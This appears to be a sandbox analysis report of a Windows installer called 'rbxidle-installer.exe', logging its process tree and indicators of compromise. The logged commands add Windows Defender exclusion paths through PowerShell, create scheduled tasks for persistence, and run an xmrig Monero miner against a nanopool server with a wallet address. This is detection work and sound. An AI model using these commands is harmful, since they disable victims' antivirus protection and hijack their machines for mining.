Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2720 wrote to memory of 4992	2720	chrome.exe	22
PID 2720 wrote to memory of 4992	2720	chrome.exe	22
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 5048	2720	chrome.exe	88
PID 2720 wrote to memory of 1212	2720	chrome.exe	89
PID 2720 wrote to memory of 1212	2720	chrome.exe	89
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90
PID 2720 wrote to memory of 4724	2720	chrome.exe	90

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://rbxidle.com/rbxidle-installer.exe?__cf_chl_tk=OCpUeNSmM5k1DefE0VxdjEPBW5IDlh3W.Cg9HDKuXVg-1708634756-0.0-4221
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffcd3c29758,0x7ffcd3c29768,0x7ffcd3c29778
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:2
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:1212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2956 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:1
  2⤵
  PID:852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2948 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4680 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:1
  2⤵
  PID:1064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5028 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5176 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5680 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5796 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4164 --field-trial-handle=1848,i,11336083487159146808,5695062061403540550,131072 /prefetch:8
  2⤵
  PID:4704

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3468

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1684

C:\Users\Admin\Downloads\rbxidle-installer.exe
"C:\Users\Admin\Downloads\rbxidle-installer.exe"
1⤵
- Executes dropped EXE
PID:2288
- C:\Users\Admin\AppData\Local\Temp\is-5HIDA.tmp\rbxidle-installer.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-5HIDA.tmp\rbxidle-installer.tmp" /SL5="$110044,125013378,776192,C:\Users\Admin\Downloads\rbxidle-installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c schtasks.exe /F /create /TN netidlr /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netidler.xml > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\netmkr.txt && schtasks.exe /F /create /TN netstartup /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netstartup.xml > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\netstartmkr.txt
    3⤵
    PID:3632
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /F /create /TN netidlr /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netidler.xml
      4⤵
      Creates scheduled task(s)
      PID:4948
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /F /create /TN netstartup /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\netstartup.xml
      4⤵
      Creates scheduled task(s)
      PID:3752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass Add-MPPreference -ExclusionPath "'C:\Users\Admin\AppData\Local\rbxidle-updater'" > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\whitelist-output2.txt"
    3⤵
    PID:2184
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass Add-MPPreference -ExclusionPath "'C:\Users\Admin\AppData\Local\rbxidle-updater'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4404
- - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe
    "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies system certificate store
    PID:2252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "chcp"
      4⤵
      PID:5796
    - - C:\Windows\system32\chcp.com
        
        chcp
        5⤵
        
        PID:5956
  - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe
      "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe" --type=gpu-process --field-trial-handle=1668,8357277042724535198,6197423008387360937,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --user-data-dir="C:\Users\Admin\AppData\Roaming\RBXIDLE" --gpu-preferences=UAAAAAAAAADgAAAIAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1676 /prefetch:2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3112
  - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe
      "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\RBXIDLE" --app-path="C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar" --no-sandbox --no-zygote --field-trial-handle=1668,8357277042724535198,6197423008387360937,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2088 /prefetch:1
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2816
  - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe
      "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,8357277042724535198,6197423008387360937,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\RBXIDLE" --mojo-platform-channel-handle=2104 /prefetch:8
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1512
  - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe
      "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\RBXIDLE.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\RBXIDLE" --app-path="C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\app.asar" --enable-sandbox --field-trial-handle=1668,8357277042724535198,6197423008387360937,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      PID:5308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\netmanager.exe"
      4⤵
      PID:800
    - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\netmanager.exe
        
        C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\modules\net\netmanager.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates system info in registry
        Modifies system certificate store
        
        PID:5100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "explorer https://discord.gg/XB94k6SxWN"
      4⤵
      PID:5076
    - - C:\Windows\explorer.exe
        
        explorer https://discord.gg/XB94k6SxWN
        5⤵
        
        PID:5004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "dxdiag /x C:\Users\Admin\AppData\Roaming\RBXIDLE\dx.xml"
      4⤵
      PID:5332
    - - C:\Windows\system32\dxdiag.exe
        
        dxdiag /x C:\Users\Admin\AppData\Roaming\RBXIDLE\dx.xml
        5⤵
        Registers COM server for autorun
        Drops file in System32 directory
        Modifies registry class
        
        PID:6612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "dxdiag /x C:\Users\Admin\AppData\Roaming\RBXIDLE\dx.xml"
      4⤵
      PID:5052
    - - C:\Windows\system32\dxdiag.exe
        
        dxdiag /x C:\Users\Admin\AppData\Roaming\RBXIDLE\dx.xml
        5⤵
        Registers COM server for autorun
        Drops file in System32 directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1788
  - - C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\xm\xmrig.exe
      C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\xm\xmrig.exe -a rx/0 -k -o stratum+tcp://xmr-us-east1.nanopool.org:10300 -u 47KJeHrhm2xQzgxg3kYx4m8SsxDAgSXSPJAroo1aCWQN2XLdDUtFaYrgKqCbkxCQ2C9KWgGqCy94UByPc3EMVkNC88Ef6By.USER-F5wxEmlCOaT9vqA --cpu-max-threads-hint=75%
      4⤵
      Executes dropped EXE
      PID:5860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /FI "ImageName eq netmanager.exe*" /T /F"
      4⤵
      PID:6732
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /FI "ImageName eq netmanager.exe*" /T /F
        5⤵
        Kills process with taskkill
        
        PID:6552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c schtasks.exe /F /create /TN idlr /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\idler.xml > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\mkr.txt
    3⤵
    PID:3936
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /F /create /TN idlr /XML C:\Users\Admin\AppData\Local\Programs\RBXIDLE\resources\components\idler.xml
      4⤵
      Creates scheduled task(s)
      PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass Add-MPPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Programs\RBXIDLE' > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\whitelist-output.txt" && "powershell.exe -ExecutionPolicy Bypass Add-MPPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RBXIDLE' > C:\Users\Admin\AppData\Local\Programs\RBXIDLE\whitelist-output2.txt"
    3⤵
    PID:5064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault004a6447hd24eh4339hb2cch9db6543d236f
1⤵
PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcc0b546f8,0x7ffcc0b54708,0x7ffcc0b54718
  2⤵
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,1280012483325310682,6012165667665751052,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
  2⤵
  PID:5556
